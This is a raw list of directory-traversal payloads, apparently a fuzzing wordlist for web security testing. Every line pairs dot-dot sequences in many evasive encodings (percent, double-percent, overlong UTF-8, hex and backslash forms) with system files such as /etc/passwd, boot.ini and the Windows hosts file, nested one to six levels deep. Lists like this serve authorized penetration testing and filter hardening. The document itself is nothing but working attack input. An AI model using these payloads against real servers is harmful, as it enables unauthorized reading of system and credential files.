-..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afetc%e0%80%afissue -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afboot.ini -..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%af..../%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -..../%25c1%259cetc%25c1%259cpasswd -..../%25c1%259cetc%25c1%259cissue -..../%25c1%259cboot.ini -..../%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..../%25c1%259c..../%25c1%259cetc%25c1%259cpasswd -..../%25c1%259c..../%25c1%259cetc%25c1%259cissue -..../%25c1%259c..../%25c1%259cboot.ini -..../%25c1%259c..../%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..../%25c1%259c..../%25c1%259c..../%25c1%259cetc%25c1%259cpasswd -..../%25c1%259c..../%25c1%259c..../%25c1%259cetc%25c1%259cissue -..../%25c1%259c..../%25c1%259c..../%25c1%259cboot.ini -..../%25c1%259c..../%25c1%259c..../%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cetc%25c1%259cpasswd -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cetc%25c1%259cissue -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cboot.ini -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cetc%25c1%259cpasswd -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cetc%25c1%259cissue -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cboot.ini -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cetc%25c1%259cpasswd -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cetc%25c1%259cissue -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cboot.ini -..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259c..../%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -..../%25c0%25afetc%25c0%25afpasswd -..../%25c0%25afetc%25c0%25afissue -..../%25c0%25afboot.ini -..../%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..../%25c0%25af..../%25c0%25afetc%25c0%25afpasswd -..../%25c0%25af..../%25c0%25afetc%25c0%25afissue -..../%25c0%25af..../%25c0%25afboot.ini -..../%25c0%25af..../%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..../%25c0%25af..../%25c0%25af..../%25c0%25afetc%25c0%25afpasswd -..../%25c0%25af..../%25c0%25af..../%25c0%25afetc%25c0%25afissue -..../%25c0%25af..../%25c0%25af..../%25c0%25afboot.ini -..../%25c0%25af..../%25c0%25af..../%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afetc%25c0%25afpasswd -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afetc%25c0%25afissue -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afboot.ini -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afetc%25c0%25afpasswd -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afetc%25c0%25afissue -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afboot.ini -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afetc%25c0%25afpasswd -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afetc%25c0%25afissue -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afboot.ini -..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25af..../%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -..../%f0%80%80%afetc%f0%80%80%afpasswd -..../%f0%80%80%afetc%f0%80%80%afissue -..../%f0%80%80%afboot.ini -..../%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afpasswd -..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afissue -..../%f0%80%80%af..../%f0%80%80%afboot.ini -..../%f0%80%80%af..../%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afpasswd -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afissue -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afboot.ini -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afpasswd -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afissue -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afboot.ini -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afpasswd -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afissue -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afboot.ini -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afpasswd -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afissue -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afboot.ini -..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%af..../%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -..../%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..../%f8%80%80%80%afetc%f8%80%80%80%afissue -..../%f8%80%80%80%afboot.ini -..../%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afissue -..../%f8%80%80%80%af..../%f8%80%80%80%afboot.ini -..../%f8%80%80%80%af..../%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afissue -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afboot.ini -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afissue -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afboot.ini -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afissue -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afboot.ini -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afpasswd -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afissue -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afboot.ini -..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%af..../%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e%2e/etc/passwd -%2e%2e/etc/issue -%2e%2e/boot.ini -%2e%2e/windows/system32/drivers/etc/hosts -%2e%2e/%2e%2e/etc/passwd -%2e%2e/%2e%2e/etc/issue -%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts -%2e%2e/%2e%2e/%2e%2e/etc/passwd -%2e%2e/%2e%2e/%2e%2e/etc/issue -%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts -%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/issue -%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/issue -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/issue -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts -%2e%2e\etc\passwd -%2e%2e\etc\issue -%2e%2e\boot.ini -%2e%2e\windows\system32\drivers\etc\hosts -%2e%2e\%2e%2e\etc\passwd -%2e%2e\%2e%2e\etc\issue -%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts -%2e%2e\%2e%2e\%2e%2e\etc\passwd -%2e%2e\%2e%2e\%2e%2e\etc\issue -%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts -%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\passwd -%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\issue -%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\passwd -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\issue -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\passwd -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\issue -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts -%2e%2e%2fetc%2fpasswd -%2e%2e%2fetc%2fissue -%2e%2e%2fboot.ini -%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%2e%2f%2e%2e%2fetc%2fpasswd -%2e%2e%2f%2e%2e%2fetc%2fissue -%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd -%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fissue -%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fissue -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fissue -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fissue -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%2e%5cetc%5cpasswd -%2e%2e%5cetc%5cissue -%2e%2e%5cboot.ini -%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%2e%5c%2e%2e%5cetc%5cpasswd -%2e%2e%5c%2e%2e%5cetc%5cissue -%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd -%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cissue -%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cissue -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cissue -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cissue -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%2e0x2fetc0x2fpasswd -%2e%2e0x2fetc0x2fissue -%2e%2e0x2fboot.ini -%2e%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e%2e0x2f%2e%2e0x2fetc0x2fpasswd -%2e%2e0x2f%2e%2e0x2fetc0x2fissue -%2e%2e0x2f%2e%2e0x2fboot.ini -%2e%2e0x2f%2e%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fetc0x2fpasswd -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fetc0x2fissue -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fboot.ini -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fetc0x2fpasswd -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fetc0x2fissue -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fboot.ini -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fetc0x2fpasswd -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fetc0x2fissue -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fboot.ini -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fetc0x2fpasswd -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fetc0x2fissue -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fboot.ini -%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2f%2e%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e%2e0x5cetc0x5cpasswd -%2e%2e0x5cetc0x5cissue -%2e%2e0x5cboot.ini -%2e%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd -%2e%2e0x5c%2e%2e0x5cetc0x5cissue -%2e%2e0x5c%2e%2e0x5cboot.ini -%2e%2e0x5c%2e%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cboot.ini -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cboot.ini -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cboot.ini -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cboot.ini -%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e%2e%252fetc%252fpasswd -%2e%2e%252fetc%252fissue -%2e%2e%252fboot.ini -%2e%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e%2e%252f%2e%2e%252fetc%252fpasswd -%2e%2e%252f%2e%2e%252fetc%252fissue -%2e%2e%252f%2e%2e%252fboot.ini -%2e%2e%252f%2e%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd -%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fissue -%2e%2e%252f%2e%2e%252f%2e%2e%252fboot.ini -%2e%2e%252f%2e%2e%252f%2e%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fissue -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fboot.ini -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fissue -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fboot.ini -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fissue -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fboot.ini -%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e%2e%255cetc%255cpasswd -%2e%2e%255cetc%255cissue -%2e%2e%255cboot.ini -%2e%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e%2e%255c%2e%2e%255cetc%255cpasswd -%2e%2e%255c%2e%2e%255cetc%255cissue -%2e%2e%255c%2e%2e%255cboot.ini -%2e%2e%255c%2e%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cpasswd -%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cissue -%2e%2e%255c%2e%2e%255c%2e%2e%255cboot.ini -%2e%2e%255c%2e%2e%255c%2e%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cpasswd -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cissue -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cboot.ini -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cpasswd -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cissue -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cboot.ini -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cpasswd -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cissue -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cboot.ini -%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e%2e%c0%2fetc%c0%2fpasswd -%2e%2e%c0%2fetc%c0%2fissue -%2e%2e%c0%2fboot.ini -%2e%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fpasswd -%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fissue -%2e%2e%c0%2f%2e%2e%c0%2fboot.ini -%2e%2e%c0%2f%2e%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fpasswd -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fissue -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fboot.ini -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fpasswd -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fissue -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fboot.ini -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fpasswd -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fissue 